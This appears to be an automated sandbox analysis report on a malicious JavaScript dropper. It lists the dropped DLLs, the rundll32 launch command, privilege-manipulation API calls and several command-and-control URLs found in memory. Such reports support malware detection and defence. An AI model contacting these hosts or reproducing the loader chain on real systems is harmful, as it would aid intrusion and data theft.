Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com//-cY
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/Ep
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/Qc-
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/)
Source: rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/ll
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/W
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/7
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/7aB
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/D
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/g5
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/onsG
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/zedv5
Source: rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/live/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repo
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

Jump to dropped file

System Summary

PE file contains section with special chars

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr	Static PE information: section name: yhDm^

Sample has a suspicious name (potential lure to open the executable)

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Static file information: Suspicious name

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8578C0 NtReadFile,	6_2_00000187EC8578C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857A54 NtWriteFile,	6_2_00000187EC857A54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8579C8 NtClose,	6_2_00000187EC8579C8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857B40 NtFreeVirtualMemory,	6_2_00000187EC857B40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857588 RtlInitUnicodeString,NtCreateFile,NtClose,	6_2_00000187EC857588
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85378C NtClose,	6_2_00000187EC85378C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8577B0 RtlInitUnicodeString,NtCreateFile,	6_2_00000187EC8577B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85B0C4 NtOpenKey,RtlpNtOpenKey,	6_2_00000187EC85B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	6_2_00000187EC85B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85AD34 NtAllocateVirtualMemory,	6_2_00000187EC85AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	6_2_00000187EC85463C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857ACC NtClose,	6_2_00000187EC857ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857694 RtlInitUnicodeString,NtDeleteFile,	6_2_00000187EC857694
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857704 NtQueryInformationFile,	6_2_00000187EC857704
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85745C RtlInitUnicodeString,NtOpenFile,NtClose,	6_2_00000187EC85745C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860A78 NtClose,	6_2_00000187EC860A78
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860A90 NtDeleteFile,	6_2_00000187EC860A90
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85CB54 NtDelayExecution,	6_2_00000187EC85CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860AC0 NtFreeVirtualMemory,	6_2_00000187EC860AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860AF0 NtWriteFile,	6_2_00000187EC860AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEB0C4 NtOpenKey,RtlpNtOpenKey,	7_2_00000201DAAEB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7A54 NtWriteFile,	7_2_00000201DAAE7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	7_2_00000201DAAE463C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE378C NtClose,	7_2_00000201DAAE378C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	7_2_00000201DAAEB1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE77B0 RtlInitUnicodeString,NtCreateFile,	7_2_00000201DAAE77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAECB54 NtDelayExecution,	7_2_00000201DAAECB54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7B40 NtFreeVirtualMemory,	7_2_00000201DAAE7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEAD34 NtAllocateVirtualMemory,	7_2_00000201DAAEAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0A90 NtDeleteFile,	7_2_00000201DAAF0A90
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7694 RtlInitUnicodeString,NtDeleteFile,	7_2_00000201DAAE7694
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0A78 NtClose,	7_2_00000201DAAF0A78
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7ACC NtClose,	7_2_00000201DAAE7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0AC0 NtFreeVirtualMemory,	7_2_00000201DAAF0AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE78C0 NtReadFile,	7_2_00000201DAAE78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE745C RtlInitUnicodeString,NtOpenFile,NtClose,	7_2_00000201DAAE745C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7588 RtlInitUnicodeString,NtCreateFile,NtClose,	7_2_00000201DAAE7588
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE79C8 NtClose,	7_2_00000201DAAE79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7704 NtQueryInformationFile,	7_2_00000201DAAE7704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950AD34 NtAllocateVirtualMemory,	8_2_000001A37950AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507B40 NtFreeVirtualMemory,	8_2_000001A379507B40
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507694 RtlInitUnicodeString,NtDeleteFile,	8_2_000001A379507694
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379510AC0 NtFreeVirtualMemory,	8_2_000001A379510AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795078C0 NtReadFile,	8_2_000001A3795078C0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507A54 NtWriteFile,	8_2_000001A379507A54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950745C RtlInitUnicodeString,NtOpenFile,NtClose,	8_2_000001A37950745C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507704 NtQueryInformationFile,	8_2_000001A379507704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950B0C4 NtOpenKey,	8_2_000001A37950B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507ACC NtClose,	8_2_000001A379507ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507588 RtlInitUnicodeString,NtCreateFile,NtClose,	8_2_000001A379507588
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950378C NtClose,	8_2_000001A37950378C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795077B0 RtlInitUnicodeString,NtCreateFile,	8_2_000001A3795077B0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950CB54 NtDelayExecution,	8_2_000001A37950CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,	8_2_000001A37950463C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	8_2_000001A37950B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795079C8 NtClose,	8_2_000001A3795079C8

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018006A2C8: DeviceIoControl,

6_2_000000018006A2C8

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,

6_2_000000018004B1A4

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIAA9D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AEC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI39EE.tmp

Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006F6A50	4_2_006F6A50
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072F032	4_2_0072F032
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071E270	4_2_0071E270
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071C2CA	4_2_0071C2CA
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007292A9	4_2_007292A9
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007284BD	4_2_007284BD
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071A587	4_2_0071A587
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006FC870	4_2_006FC870
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072D8D5	4_2_0072D8D5
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00714920	4_2_00714920
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071A915	4_2_0071A915
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00720A48	4_2_00720A48
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006F9CC0	4_2_006F9CC0
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00725D6D	4_2_00725D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180017FE8	6_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006DFF4	6_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800220D8	6_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007C140	6_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060174	6_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008023C	6_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000834C	6_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006C470	6_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800784E0	6_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800764F0	6_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060578	6_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010580	6_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004E5DC	6_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062600	6_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180002610	6_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180004638	6_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004A650	6_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E760	6_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800647B0	6_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007E7C7	6_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180076930	6_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062954	6_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006A994	6_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E9FC	6_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180082A18	6_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180072A27	6_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010B58	6_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180026C84	6_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001ECF4	6_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180008E20	6_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180052FD8	6_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018003AFE8	6_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005D014	6_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F0B4	6_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800630CC	6_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005912C	6_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278	6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007B2D0	6_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002B2EC	6_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006D3D4	6_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800033E0	6_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180075480	6_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800694A0	6_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005958C	6_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800576DC	6_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800097E0	6_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800277FC	6_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002D964	6_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073B60	6_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007BBB0	6_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001BC38	6_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005DD18	6_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073DF0	6_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180011DF0	6_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005BE6C	6_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004FF88	6_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851030	6_2_00000187EC851030
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1030	7_2_00000201DAAE1030
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501030	8_2_000001A379501030

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 0071325F appears 103 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 00713790 appears 39 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 00713292 appears 70 times

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.spre.troj.evad.winJS@40/28@2/3

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,	6_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,	6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018008395A

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

4_2_006F3860

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

4_2_006F4BA0

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F45B0 LoadResource,LockResource,SizeofResource,

4_2_006F45B0

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

6_2_0000000180049AEC

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF428E4FF550ED71C3.TMP

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Installer\MSI3B6A.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq

Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	Binary or memory string: select * from sqlite_sequence;
